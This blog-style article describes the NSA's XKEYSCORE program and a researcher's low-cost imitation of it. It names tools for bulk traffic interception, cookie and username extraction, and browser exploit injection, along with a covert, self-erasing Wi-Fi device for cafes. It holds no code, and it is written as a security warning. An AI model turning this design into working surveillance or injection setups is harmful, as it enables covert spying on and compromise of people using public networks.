You might heard of Edward Snowden one of the greatest NSA whistleblower, and his leaks for NSA surveillance documents where he exposed what NSA is doing and how they are spying each one of you around the world. They build a program called XKEYSCORE a massive system for vacuuming up and sifting through emails, chats, images, searching, and other personal information from the core of the internet (Backbone) around the world
What is NSA XKEYSCORE Program?
NSA calls it ‘Widest Reaching’ and it was established in 2008 depending on more than 1000 servers that can store data and rearrange it form the backbone of the internet. They use patterns and connections to fetch data from users and store their servers.
How does their Surveillance program work?
The NSA’s super-secret surveillance system, in fact, works very much the way off-the-shelf intrusion detection systems (IDS) function: With these systems, when a data packet arrives in a network, a high-volume filter separates garbage traffic from the important traffic and passes the latter to a load balancer, which distributes data to a number of servers. In this case, it distributes the data to network intrusion detection nodes or devices. The IDS nodes then parse the traffic to determine if it’s benign or malicious and make decisions about what to do based on those conclusions, such as blocking the traffic if it’s malicious and issuing an alert to administrators.
Following the same general design, Weaver developed a home-grown surveillance system that took less than a week to construct. To approximate a filter and load balancer, he used OpenFlow, a protocol for managing and directing traffic among routers and switches on a network. For his intrusion detection system, he used the Bro Network Security Monitor, an open-source framework developed by Vern Paxson, a fellow computer scientist at UC Berkeley. He had to write scripts to do things like extracting the cookies in web traffic and parse out usernames from traffic, but this was minimal work.
Those looking to do more robust backbone monitoring and data parsing as the NSA does could opt instead for
Vortex, an IDS that the US defense contractor Lockheed Martin developed and released for free on GitHub. Weaver thinks, in fact, that the NSA’s XKEYSCORE system probably began its life as Lockheed Martin’s Vortex, based on XKEYSCORE system features described in the Snowden documents.
With Weaver’s DIY system, in order to search through the collected data, he just did local searches. But if someone wants to do broader federated searches, they could use Hadoop, an open-source framework for storing and processing large amounts of data spread among multiple systems. Hadoop can parse similar sets of data into so-called buckets to make processing or searching data more efficient. For example, IP addresses can be parsed out and categorized in one bucket, and cookies and usernames can be categorized in other buckets. To find, for example, every IP address that visited a certain web page, a search would only need to focus on data in the IP bucket. “Hadoop will allow me to search all the data [simultaneously], but most of my searches actually only need to look at a couple of buckets,” Weaver says.
Advanced, Targeted Spying
Weaver’s surveillance solution isn’t complete without a way to conduct targeted surveillance. That’s because bulk surveillance is all about trying to find needles in a haystack—those few data points among billions that merit further scrutiny. But once spies home in on those they need to conduct more efficient and pinpointed intelligence-gathering. They do this by hacking a target’s system. The NSA and its British spy partner the GCHQ use a system called QUANTUM Insert that involves a man-on-the-side attack and code injection. The system works by hijacking a browser as it’s trying to access a web page and forcing it to visit a malicious web page instead, where malware gets secretly downloaded to the target’s computer.
The spy agencies used QUANTUM Insert to hack into the machines of terrorist suspects in the Middle East as well as the machines of employees working for the Belgian telecom Belgacom.
Weaver’s low-rent alternative for doing malware injection is to use the built-in injection capabilities in Bro. But someone could also use AirPwn—a tool often used by hackers as a prank to hijack someone’s browser and display porn or other raunchy images on it. “This is an old technique; it’s used for jokes,” Weaver says.
The Anywhere, Anyone Spy
Weaver notes that his surveillance system can actually be made more compact and portable by using off-the-shelf ARM/Wi-Fi embedded systems, which would be perfect for nation-state spies looking to target government workers. The spies could easily take the system to a Starbucks frequented by State Department employees, lawmakers or military personnel and use it to extract metadata belonging to customers who use the cafe’s wireless network. The metadata can help identify targets worthy of further surveillance, who can then be tracked online after they’ve left Starbucks, through this and other metadata. Such a system could easily be disguised as a plug-in air freshener inserted into an electrical outlet, Weaver notes. It could also be designed to erase itself automatically if someone unplugs it from the socket to examine it.
“Any foreign intelligence agency could install surveillance devices in every downtown DC Starbucks, use bulk surveillance to identify all the network visitors and, for any visitor who meets their criteria, directly inject exploits into their web browsing,” Weaver wrote in a blog post last year about his system. “DC hotels are similarly vulnerable to slightly larger installations such as my demonstration box…. We need to act like every open wireless network or hotel in the Washington area is potentially compromised. And with the low cost of such installation, it doesn’t even need to remain the realm of foreign intelligence services.”